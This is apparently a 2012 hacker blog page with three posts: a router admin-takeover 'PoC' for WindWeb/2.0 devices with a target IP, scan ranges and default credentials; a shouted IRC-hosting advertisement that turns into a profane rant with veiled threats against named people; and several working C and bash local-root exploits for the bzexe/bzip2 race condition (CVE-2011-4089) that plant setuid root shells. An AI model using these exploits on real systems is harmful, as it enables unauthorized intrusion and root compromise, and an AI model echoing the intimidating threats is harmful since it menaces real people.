Help pay for xds lawyer fees.
LR

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kep pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass
comments: 0 » tags: , , , , , , , , , ,

LINUX HOSTING/IRC/ANTI-DoS NETWORK ~ GLOWSHELLS.NET IS FINALLY REOPENING!

Posted on 26th March 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

YEP FOLKS IT IS TRUE…

JUST WAITING ON FINALISING 2 OF THE DEDIS/COLOS AND ARE UP! THIS IS VERY AWESOME NEWS FOR ANYONE WHO STILL CARES FOR IRC!

YOU CAN BELIEVE IT GLOW WILL BEAT ANYONE,OFFER GTCOMM/STAMINUS/HOSTVIRTUAL AND ANOTHER UNNAMED COMPANY FOR ALL HOSTING/INCLUDES SOME WEB HOSTING EVEN IN SOME SPECIAL CASES IF THATS WHAT IS WANTED THEN GLOW WILL DOIT, IPV6 AND IPV4,THE GTCOMM BOXES ARE IRC/SHOUTCAST/IRCD/ANYTHING-YOU-WANT-ON-IRC BOXES AND, AT MOMENT IN MIDDLE OF PURCHASING THE DEDIS, AND, THE COLO BOX :D

REALLY GLOW COULD IOPEN AN HAVE OPENED AGES AGO, BUT, THEY JUST WAITED TO GET SOME DECENT IPV4 BACKBONES..SO I GUES THEYRE USABLE BUT, THEYRE JUST GOING TO ACTUALLY COMPETE, SOON…WICH WILL BE GREAT FOR EFNET.. AS, IT NEEDS THIS TYPE OF CO.

SOME MEMBERS WHO HAVE BEEN WITH US FOR AWHILE, WILL REALLY BE ADMINISTRATING THNGS, ALTHO, IT WILL BE ONLY THE SAME OWNER AS BEFORE *MOUSE_*WHO WILL BE HANDLING THE MAIN THINGS.

MOST OF IT THEN, WILL HAVE AN ADMIN OR ONE AND ONE CO ADMIN  PER BOX WICH WILL BE ON CALL 24/7 AND IF NOT YOU GET 1MONTH REFUND, YEP THATS THE TRUTH, IF YOU ENTER, AND, ARE CUSTOMER, AND ARE NOT HELPED WITHIN, 15MINUTES OF YOUR CHANNEL STAY, THE MONTH OR, A VHOST, SOMETHING, IS AUTOMATICALLY AND MAGICALLY, FREE!!! CANT BEAT THAT FOR SERVICE,ATLEAST YA KNOW IT GONNA BE GOOD!

SINCE THE BOXES ARE IN USA/CANADA/FRANCE/NETHERLANDS/SINGAPORE ,WE DECIDED TO MAKE 100% UPTIME BOXES,AND THAT IS SIMPLY USING ONE GTCOMM ADDY, FOR IRC OFCOURSE, WICH SITS ON A 4000GBPS ANTI D0S NETWORK.IT IS THE BEST GLOW IS ABLE AND CAN DO AND IT IS ALSO THE MOST EXPENSIVE NETWORKING, AND REQUORES VERY HIGH ID FOR JUST AX, IS THE MOST EXPENSIVE ROUTE TO TAKE FOR ANY SERVER SETUPS I HAVE SEEN… THIS SEEMS LIKE A ROBUST SERVICE AND, BOASTING ALREADY 400 VHOSTS JUST IN IPV6, WICH HALF ARE NOT EVEN TURNED ON APPRENTLY..MEANING, THEY HAVE OMUCH, THEY REALLY NOW, JUST WANT TO MAKE IT SHARED AND, FOR THOSE WHO WANT 100% UPTIME WRAITH BOTPAX ETC, WELL, HOW CAN YA BEAT, A LOGIN WICH HAS 4 BOXES IN 4 COUNTRIES!! HAHA! YA CANT, IT IS PERFECT, YOU CONTROL THEM, YOU HAVE 100% CONTROL.. SO, YOU GET A 100% AWESOME PRODUCT IN THE END!!! IT IS AWESOME FOR ANYONE HOSTING WRAITH, AND JUST NOW AS IT IS ON THE VPS GTCOMM, IT IS ALREADY HOSTING VERY EASILY, OVER 5-6 PEOPLE AND, THATS WITH OVER 30 WRAITHS NOW..AND NOT ONE BIT OF LAG.

ALTHO THERE WILLBE A COLO BOX THIS WONT BE OPENING FOR ATLEAST ONE MONTH BUT THE DEDIS WILL OPEN THIS WEEK,AND THE VPS IS ACTUALLY UP,IS FINE FOR HOSTING SO GLOW HAVE ALREADY BEEN NOW ACEEPTNIG NEW PEOPLE WHO  ARE SIMPLY FEDUP WITH ONE BOX/LOCATION AND/OR, SIMPLY KNOW THE DEICATION GLOWSHELLS HAS ALWAYS HAD WITH EFNET.

AS I UNDERSTAND IT WILL BE USING UNDERNET/AUSTNET/EFNET/DALNET/LCIRC/RIZON AND MOST COVERED NETWORKS WHO, WELL I ASSUME THOSE WERE OLD PLACES USED..

 

I KNOW FOR AUSSIES THIS IS ESPECIALLY COOL, AS ONE OF THE ADMINS IS AN AUSSIE, AND, HE IS NOT HALF BAD WHEN YOU ACTUALLY ARE NOT CALLING HIM AN A**E ETC..

 

ANYHOW FACT IS, GLOWSHELLS HAS AND ALWAYS WILL BE LIKE NO-OTHER, AND AT MOMENT IF YOUR INTERESTED IN ANYTHING THEN, HEAD TO EFNET IRC IRC.EFNET.ORG AND JOIN #GLOWSHELL-SUPPORT AND SIMPLY WAIT AND, WELL IM JUST WAITING TO SEE MOUSE OPPED AGAIN WHERE SHE SHOULD BE :D

 

I THANK PEOPLE ON EFNET, SPECIALLY SOME LIKE, RFS,CYPHER,FUZION,GIZMORE/WECHALL CHALLENGES,SERH,R0X0R,LORDNIKON,D3MON AND EINS AND EVEN JIMIGJ! HECK, YOU ALL HAVE SOMETHING UNIQUE IN SOME WAY…AND, I WILL BE SURE EVEYONE OF YOU IS HELPED…TALI FOR ALL YOUR HELP WITHOUT HARDLY KNOWING ME, WITH THE GTCOMM FAKE CHANNELS LOL)… AND, FUCKS TO ICER AND KRASHED, AND, YOU BOTH KNOW WHY, YOUR FUCKING BOTH BEEN BUSTED, BOTH HELPIN EACH OTHER, AND PEOPLE ARE STILL GETTING BUSTED…NOW, SINCE I HAVE REPORTED MR KRASHED TO GTCOMM, HIS DDOS HAS STOPPED.AND, I STILL DONT EVEN KNOW WHY HE DID NOT SIMPLY, TALK TO ME, LIKE HUMANS DO.

ANYHWO THINK HARD AND TALK FAST ARSEHOLE… BECAUSE, YOUR THE ONLY SOUR GRAPE IN MY MOUTH.

NOW, AS I WAS SAYING, ENJOY THE RETURN OF GLOWSHELLS AND BE NICE AS ALWAYS! HA!

DRU / XD / WORLDWIDE / KRYPTIK / AKA TEAM 0X90 , YEA, BITCHEZ, THE REAL DEAL HAS NEVER BEEN SO IN YA FACE.

 

NOW READ ON…

 

AND ON THE SOUR NOTE:

AS FOR ICER, YOU HAD A PACT WITH SOMEONE TO MAKE SOMETHING, YOU KNOW, SOMETIMES PEOPLE RELY ON THOSE FUNDS,A ND, WERE OF THE THOUGHTS THAT PERHAPS, YOU WERE IN NO PORBLEMS AS, YOU HAD NOT SAID ANYTHING AND, ASSUMED, EVEYTHING WAS GOING FINE, BUT, AS YOU SAW, IT WAS, ABIT OF DISTRUST ON ONE SIDE BUT, YOU HAD THE CHANCE TO TALK TO THE WEB DESIGNER AND INSTEAD YOU GO HAND THE MONEY TO SOME FUCKING YANKEE WHO PROLLY DOESNT NEED IT.

WELL YOU WILL PAY 200X 10, ATLEAST FOR THAT INSULT YOU SHIT HEAD.

AND NO, I DONT THINK YOUR A *FED* BUT, I DEFINATELY WONDER WHY YOU WOULD ALLOW THIS KRASHED FELLOW, WHO IS A KNOWN HBI SNITCHER, TO HAVE SOMUCH DAMNA XCS TO THE BOTS AND, EVEYTHING IT SEEMS ABOUT YOUR MAGICSHELLS FILTH COMPANY..AND OH FUNNY BUT, WHEN I INVESTIGATED THE IPS, I FOUND OMETHING FUNNY…YEA…AND, I WONT MENTION IT HERE BUT LETS JUST SAY, SHAME ON YOU FOR ALLOWING ANYONE TO RUN B OTNET FROM YOUR SHIT YOU MAGGOT. AND REMEMBER WHERE YOU LIVE, AND THEN WHY THEY ARE SO COCKY AND WHERE THEY LIVE.

JUST REMEMBER, I AINT A FUCKING CRIPPLE MOTHERFUCKER, YOU BETTER FIX THINGS VERY DAMN FAST ABOUT THAT 200 BUX WICH WA MEANT TO BE HEADED MY WAY, AND, THATS BUSINESS YOU CALL IT, TO USE ME, AS A GO BETWEEN, SO, I ASSUME YOU DONT SPEAK TO YOUR BOSSES THEN ? YOU JUST SEND IN A COFFEE BOY AND ASK HIM TO ASK THE BOSS YES / COZ YOU SAID, THATS HOW YOU DO BUSINES… AND, AS I SHOWED YOU, AND WILL KEEP SHOWING YOU, IT IS NOT HOW I DO MY BUSINESS, ASFAR AS I SEE IT, IM OWED 200BUX, AND, SURE, YOU CAN HAVE WHATEVER DEIGN YOU WERE ALREADY THINKING, OR SIMPLY, COP THE FINE, WICH IS MORE FUN FOR ME! BELIEVE ME ARSEHOLE, YOU OWN A SHITTY LITTLE INT CAFE I ALREADY TRACKED DOWN, NOW YOUR EVEN CLOSER TO ME THAN EVER…AND, YOU THINK I WONT USE YOUR CASH AGAINST YOU STUPID. WHERE YOU THINK THE PAIN IS GREEK ? EH, ITS ALWAYS IN THE PCKET.. ASK KCOPE, HE HAS NO PCOKETS THANKS TO HIS FUCKUP IN 2K9… AND STILL, WILL NEVER, EVER BE ACCPETED,EVEN IF HE MADE A REMOTE ROOT FOR EVRY OS IN EXISTANCE AND, I WILL BE SURE TO MAKE YOUR REP THE SAME BITCH.

IT IS NOT HARD AND AS I SAID, I JUST HAVE TO SHOWUP TO YOUR FUCKING *ANYWHERE* I LIKE, COZ, IT IS A PUBLIC FUCKING WORLD…AND, SPEAK NICELY TO YOU :)

HEY, I DID NOT SAY ANYTHING ABOUT BEATINGS ETC… I JUST SIMPLY MENTIONED, YOUR PRIORITYS, YOUR WANTS AND LOVES, AND, HOW EASILY THOSE, CAN BE USED AGAINST PEOPLE NOWDAYS AND ALWAYS DAYS.

comments: 0 » tags: , , , , , , , , ,

Bzexe (bzip2 and possibly bunzip2) race condition->localroot

Posted on 1st November 2011 in Codes, Exploits

CVE-2011-4089 – bzip2/bzexe Local root race condition
OK since there has been alot of chatter about this on the seclists.org and FD… I decided to give credit where it is due… Firstly a brief outline of the bug…
bzexe is now apparently, ALSO same code as bzip2 wich wouldmean, that this would be updated in the way of, possible races to be won…
Anyhow, many talks with lh/loophole,bugz,vladz,Benjamin renaut,kcope and others have shown me ways to exploit it… and yes it is possible, and even with bzip2… now, lets look at it abit..
Here is PoC main updated also in the newer post on this :

Affected is about every distro wich has bzip2 or bzexe , pick your binary and compress some file with that binary, then launch this exploit with ./exploit my-compressed-file ,wait for root..

/*
   bzexec_PoC.c -- bzip2 (bzexe) race condition PoC (CVE-2011-4089)

   Author:    vladz (http://vladz.devzero.fr)
   Tested on: Debian 6.0.3 up to date (bzip2 version 1.0.5-6)

   This PoC exploits a race condition in the bzexe script.  This tool is
   rarely used so I wasn't supposed to write an exploit.  But some people
   on the full-disclosure list had doubts about this exploitation.  Public
   discussion about this issue started from this post:  

http://seclists.org/fulldisclosure/2011/Oct/776.

   I am using Inotify to win the race (on my dual-core, it succeed 100%).
      Usage: ./bzexe_PoC <command_name>

   For instance, if "/bin/dd" has already been compressed with bzexe,
   launch:
      $ ./bzexe_PoC dd
      [*] launching attack against "dd"
      [+] creating evil script (/tmp/evil)
      [+] creating target directory (/tmp/dd)
      [+] initialize inotify
      [+] waiting for root to launch "dd"
      [+] opening root shell
      # whoami
      root
*/
#define _GNU_SOURCE
#include <sys/inotify.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <fcntl.h>

int create_nasty_shell(char *file) {
  char *s = "#!/bin/bash\n"
            "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
            "gcc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
            "chmod 4755 /tmp/sh; rm -f ${0}; ${0##*/} $@\n";

  int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
  write(fd, s, strlen(s));
  close(fd);
  return 0;
}

int main(int argc, char **argv) {
  int fd, wd;
  char buf[1], *targetpath,*evilsh = "/tmp/evil", *trash = "/tmp/trash";
  if (argc < 2) {
    printf("usage: %s <cmd name>\n", argv[0]);
    return 1;
  }
  printf("[*] launching attack against \"%s\"\n", argv[1]);
  printf("[+] creating evil script (/tmp/evil)\n");
  create_nasty_shell(evilsh);
  targetpath = malloc(sizeof(argv[1]) + 6);
  sprintf(targetpath, "/tmp/%s", argv[1]);
  printf("[+] creating target directory (%s)\n", targetpath);
  mkdir(targetpath, S_IRWXU|S_IRWXG|S_IRWXO);
  printf("[+] initialize inotify\n");
  fd = inotify_init();
  wd = inotify_add_watch(fd, targetpath, IN_CREATE);
  printf("[+] waiting for root to launch \"%s\"\n", argv[1]);
  syscall(SYS_read, fd, buf, 1);
  syscall(SYS_rename, targetpath,  trash);
  syscall(SYS_rename, evilsh, targetpath);
  inotify_rm_watch(fd, wd);
  printf("[+] opening root shell (/tmp/sh)\n");
  sleep(2);
  system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
  return 0;
}

thats the latest code and yes wins every race…

The exploit works as follows.
This isn't refined (why bother?) but worked.
1. determine which files are bzexe'd on a system say bash
2. create a matching directory you own in /tmp
3. create a exploit script in /tmp

4. watch for the existence of /tmp/bash/gztmp* we want to know before the gztmp file is renamed to bash.
larry@b0rk:~$ while (true) do ./exp.sh ; done

#!/bin/bash
if [ -a /tmp/bash/gztmp* ]
then
echo "Exploting bzexe."
mv /tmp/bash /tmp/bash.dir
echo "Copying evil file into place."
cp /tmp/bad /tmp/bash
fi

This is a difficult race condition to win, but it can be won maybe 60% of
the time. Also my system is 256mb of ram @ 500mhz. Probably much easier
to win a race than on a dual core 3.0 ghz system?

Failures will show:
root@b0rk:/root# ./bash <-- missed copy
./bash: 22: /tmp/bash: not found

root@b0rk:/root# ./bash <-- race failed because permissions weren't set
yet on bash from cp
./bash: 22: /tmp/bash: Permission denied

Success will show:
root@b0rk:/root# ./bash
root@b0rk:/root# ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1024 2010-07-03 11:55 /etc/shadow

larry@b0rk:~$ while (true) do ./exp.sh ; done

Thankyou for that, it was a very good description and also allows others to create a poc :)
Ohwish, here is one…

/*
  bzexe race condition POC  ////   on some boxes bzexe = bzip2 (exact code)
  Benjamin Renaut <ben@tokidev.fr>
  --
  Example of use:
  $ gcc bz.c -o bz -O3
  $ ./bz ls

  then in another shell (as root):
  # cp /bin/ls ./
  # bzexe ls
  # bzip2 ls
  # ./ls
-> and check /tmp/bzexe.xd
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <dirent.h>
#include <errno.h>

char* shellcode="#!/bin/sh\nsh >/tmp/bzexe.xd\n";

int write_shellcode(char* dest) {
FILE* fdest=fopen(dest, "w");
if(fdest==NULL)
return(-1);
if(chmod(dest, 0777))
return(-1);
fprintf(fdest, shellcode);
fclose(fdest);
return(0);
}

int main(int argc, char** argv) {
DIR* tdir;
struct dirent* tdirent;
char dirname[4000];
char target[4000];
if(argc!=2) {
printf("Usage: %s [ANY BINARY]\n", argv[0]);
printf("- Will wait for BINARY to be executed (through bzexe/bzip2) and then will try and exploit it\n");
return(0);
}
snprintf(dirname, 4000, "/tmp/%s", argv[1]);
if(mkdir(dirname, 0777)) {
perror("- mkdir");
return(-1);
}
while(1) {
tdir=opendir(dirname);
if(tdir==NULL) {
perror("- opendir");
return(-1);
}
while((tdirent=readdir(tdir))!=NULL) {
if((strncmp(tdirent->d_name, "gztmp", 5)==0) && (tdirent->d_type & DT_REG)) {
snprintf(target, 4000, "%s/%s", dirname, tdirent->d_name);
if(unlink(target)) {
perror("- unlink");
return(-1);
}
if(rmdir(dirname)) {
perror("- rmdir");
return(-1);
}
if(write_shellcode(dirname)) {
printf("- Fail\n");
return(-1);
}
printf("+ Success\n");
return(0);
}
}
closedir(tdir);
}
return(0);
}

Now that works great and, you just then with that .c , need to run ANY bzip2 or bzexe and bingo, you will hav shell :)
It is tricky, but it is possible.. just use the info, and, it is tested and working.. this sh version, would need tweaking but, it is very good attempt to make a poc for a starters go, as it must, be detached and execute the payload seperately really for it to work, so maybe this would be better to have a .c file seperate wich simply makes the looping bzip2, then again, you could also use that code up there, and Inotify code made for ALL tmp./ wich i will show abuit further on..

##////////////////exploit.sh
#!/bin/bash
##BZEXE/BZIP2 Compress<->Decompress race condition (local root exploit)
echo "~~ +[!] BZEXE/BZIP2/BUNZIP2 [Compress<->Decompress] Race condition & (LocalRoot) [!]+-~~"  >&2
cd /tmp
mkdir /bash/sh
chmod +x /bash/sh
dd if=/dev/zero bs=135k count=15000 of=/tmp/bash/shell
cat > /tmp/bash/bad << __EOF
#!/bin/sh
chmod 777 /tmp/bash/sh
__EOF
if [ /bin/bzexe ]
then
/bin/bzexe /tmp/bash/shell
echo ""  >&2
else
if [ /bin/bzip2 ]
then
/bin/bzip2 /tmp/bash/shell
echo ""  >&2
else
echo "[!!] Test: Decompression bug with: bunzip2 -d bug.bz2 .."  >&2
if [ /bin/bunzip2 && /tmp/bash/shell.bz2 ]
/bin/bunzip2 -d /tmp/bash/shell.bz2
echo "[-] "  >&2
ls -l shell.bz2
echo "[+] Test: bunzip2 -d is now running .."  >&2
then
if [ -a /tmp/bash/gztmp* ]
then
echo "[*] Trying the move/copy bad script.sh .."  >&2
mv /tmp/bash/shell /tmp/bash/bash.dir
cp /tmp/bash/bad /tmp/bash/sh
echo "[!] OK! We will check for our shell (2 places possible) .."  >&2
ls -l /tmp/bash/sh
ls -l /tmp/bash/bash.dir
./tmp/bash/sh
if [ /tmp/bash/sh ]
echo "-> Spawning rootshell .."  >&2
echo ""  >&2
else
if [ /tmp/bash/bash.dir ]
echo "-> UID0 - Have fun .."  >&2
echo ""  >&2
then
whoami
su
id
uptime
uname -ar
fi
fi
fi
fi
fi

Thats the *first* PoC wich was not really tested but looks to be on the right path for sure… it may need to have some tweaking but, thats atleast 2 symlink problems here… now lets look at something else…
wich, you could just let run, and it would CATCH all these exceptions:

/*
 * hax_inotify_tempracecardriver.c
 *
 * /tmp, /var/tmp, /usr/tmp inotify watch POC.
 * This will catch 100%* of mkstemp(), tmp files, etcetera usages in
 * the above directories.
 *
 * *[1] This is true if IN_Q_OVERFLOW is not reached.
 * You can check your max queued events by looking inside of:
 * /proc/sys/fs/inotify/max_queued_events
 * The value in this file is used when an application calls
 * inotify_init(2) to set an upper limit on the number of events that can
 * be queued to the corresponding inotify instance.  Events in excess of
 * this limit are dropped, but an IN_Q_OVERFLOW event is always generated.
 *
 * <Scrippie> 100% wut? liez and slander!
 * <lh> it can be 100% though if /proc/sys/fs/inotify/max_queued_events
 *      is larger than your avail inodes
 * <lh> i'm not that big of a liar :\
 * <kcope> dont try to be smarter than Scrippie :> <3
 * Example to determine inodes and update max_queued_events:
 * cd /proc/sys/fs/inotify/
 * tune2fs -l /dev/<FS>|grep "Inode count"|awk '{print $3}' > max_queued_events
 * *******************************************************************************
 * Modify accordingly for owning temp race conditions.
 * This will print detailed stat information regarding creation,
 * metadata changes (permissions, timestamps, extended attributes, etc.),
 * and deletion.
 * The inotify API provides a mechanism for monitoring file system
 * events, merged into the kernel since 2.6.13-R3.
 * Author: loophole/lh (Cody Tubbs) codytubbs@gmail.com 2011-05-27
 * HAX 2011
 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <time.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>

#define LOGFILE "tmpfiles.out"

#define BUF_LEN (1024*(16+16))
#define PATH "/tmp"
#define PATH2 "/var/tmp"
#define PATH3 "/usr/tmp"

int main(int argc, char **argv){
  int length, i, fd, wd, wd2, wd3;
  char buf[BUF_LEN];
  char fp[256];
  char type[56];
  struct stat sb;
  FILE *file;
  time_t ltime; /* calendar time */
  fd = inotify_init();
  if(fd < 0){ perror( "inotify_init" ); }
  file = fopen(LOGFILE, "a");
  wd = inotify_add_watch( fd, PATH, IN_CREATE | IN_ATTRIB | IN_DELETE);
  wd2 = inotify_add_watch( fd, PATH2, IN_CREATE | IN_ATTRIB | IN_DELETE);
  wd3 = inotify_add_watch( fd, PATH3, IN_CREATE | IN_ATTRIB | IN_DELETE);
  for(;;) {
    i=0;
    length = read(fd, buf, BUF_LEN);
    if (length < 0){ perror("read"); }
    while(i < length){
      struct inotify_event *event = (struct inotify_event *) &buf[i];
      if(event->len){
        if(event->mask & IN_CREATE){
          snprintf(type, sizeof(type), "BEEN CREATED");
          goto stat;
        } else if(event->mask & IN_ATTRIB){
          snprintf(type, sizeof(type), "ATTRIBUTE CHANGE(S)");
          goto stat;
        } else if(event->mask & IN_DELETE){
          snprintf(type, sizeof(type), "BEEN DELETED");
          ltime = time(NULL); // get current cal time
          printf("The file [%s] has [%s] at %s\n", event->name, type, asctime(localtime(&ltime)));
          fprintf(file, "The file [%s] has [%s] at %s\n", event->name, type, asctime(localtime(&ltime)));
          goto gettime;
        }
stat:;
        snprintf(fp, sizeof(fp), "%s/%s", PATH, event->name);
        if(stat(fp, &sb) == -1){
          snprintf(fp, sizeof(fp), "%s/%s", PATH2, event->name);
          if(stat(fp, &sb) == -1){
            snprintf(fp, sizeof(fp), "%s/%s", PATH3, event->name);
            if(stat(fp, &sb) == -1){
              perror("stat");
            }
          }
        }
        ltime = time(NULL); // get current cal time
        printf("The file [%s] has [%s] at %s\n", event->name, type, asctime(localtime(&ltime)));
        fprintf(file, "The file [%s] has [%s] at %s\n", event->name, type, asctime(localtime(&ltime)));
        printf("File type:                ");
        fprintf(file, "File type:                ");
        switch (sb.st_mode & S_IFMT){
          case S_IFBLK:  printf("block device\n");     fprintf(file, "block device\n");     break;
          case S_IFCHR:  printf("character device\n"); fprintf(file, "character device\n"); break;
          case S_IFDIR:  printf("directory\n");        fprintf(file, "directory\n");        break;
          case S_IFIFO:  printf("FIFO/pipe\n");        fprintf(file, "FIFO/pipe\n");        break;
          case S_IFLNK:  printf("symlink\n");          fprintf(file, "symlink\n");          break;
          case S_IFREG:  printf("regular file\n");     fprintf(file, "regular file\n");     break;
          case S_IFSOCK: printf("socket\n");           fprintf(file, "socket\n");           break;
          default:       printf("unknown?\n");         fprintf(file, "unknown?\n");         break;
        }
        printf("I-node number:            %ld\n", (long) sb.st_ino);
        printf("Mode:                     %lo (octal)\n", (unsigned long) sb.st_mode);
        printf("Link count:               %ld\n", (long) sb.st_nlink);
        printf("Ownership:                UID=%ld GID=%ld\n", (long) sb.st_uid, (long) sb.st_gid);
        printf("Preferred I/O block size: %ld bytes\n", (long) sb.st_blksize);
        printf("File size:                %lld bytes\n", (long long) sb.st_size);
        printf("Blocks allocated:         %lld\n", (long long) sb.st_blocks);
        printf("Last status change:       %s", ctime(&sb.st_ctime));
        printf("Last file access:         %s", ctime(&sb.st_atime));
        printf("Last file modification:   %s", ctime(&sb.st_mtime));
        fprintf(file, "I-node number:            %ld\n", (long) sb.st_ino);
        fprintf(file, "Mode:                     %lo (octal)\n", (unsigned long) sb.st_mode);
        fprintf(file, "Link count:               %ld\n", (long) sb.st_nlink);
        fprintf(file, "Ownership:                UID=%ld GID=%ld\n", (long) sb.st_uid, (long) sb.st_gid);
        fprintf(file, "Preferred I/O block size: %ld bytes\n", (long) sb.st_blksize);
        fprintf(file, "File size:                %lld bytes\n", (long long) sb.st_size);
        fprintf(file, "Blocks allocated:         %lld\n", (long long) sb.st_blocks);
        fprintf(file, "Last status change:       %s", ctime(&sb.st_ctime));
        fprintf(file, "Last file access:         %s", ctime(&sb.st_atime));
        fprintf(file, "Last file modification:   %s", ctime(&sb.st_mtime));
gettime:;
        printf("\n\n");
        fprintf(file, "\n\n");
      }
    i += 16 + event->len;
    }
  }
  (void) inotify_rm_watch(fd, wd);
  (void) close(fd);
  fclose(file);
  exit(0);
}

Thx verymuch to LH :) for this wich, is very handy for catching *any* race, wich, many of wich we wont even see unless we can see the tmp files made from siome backup scripts etc…
There is much more to this but, really it is trivial, and, you could probably make a working bash script, and feel free to add a comment of a BETTER poc or email it to me and, all credit will goto you )
remember also, bzexe = bzip2 code, as they say online and, as the tarball is, also, this would possibly now link to bunzip2, and, this is why the hax_inotify etc, are handy to see what tmpfiles are made, because the ln problem will most likely work for all 3 binarys, not ONLY bzexe/bzip2 , those are definates.
Enjoy and thanks to all who helped on this one!
xd

comments: 1 » tags: